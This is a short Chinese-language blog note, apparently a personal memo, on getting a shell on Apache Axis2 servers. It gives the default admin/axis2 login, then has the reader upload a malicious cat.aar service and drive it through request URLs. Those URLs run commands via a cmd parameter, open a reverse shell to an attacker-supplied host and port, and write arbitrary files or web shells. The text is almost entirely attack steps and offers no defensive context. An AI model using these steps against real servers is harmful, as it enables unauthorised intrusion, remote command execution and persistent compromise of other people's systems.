Axis2恶意部署getshell

简介

以前遇到的,记录一下,便于以后查阅

过程

一般默认的账号是admin密码是axis2,登陆后:点击upload service
1
上传cat.aar文件,可看到上传成功。
2
点击Available Services可选择可用的功能。
3
主要功能有:
1、getClassPath
4
2、执行命令:
参数:
cmd=xxx
5
3、反弹shell:
https://192.168.86.254:8443/axis2/services/Cat/shell?host=x.x.x.x&port=x
6
4、写入shell或是写入文件
https://192.168.86.254:8443/axis2/services/Cat/writeStringToFile?data=数据&file=文件路径&encoding=utf-8&append=false

详细过程请参考:http://p2j.cn/?p=1533

-------------本文结束感谢您的阅读-------------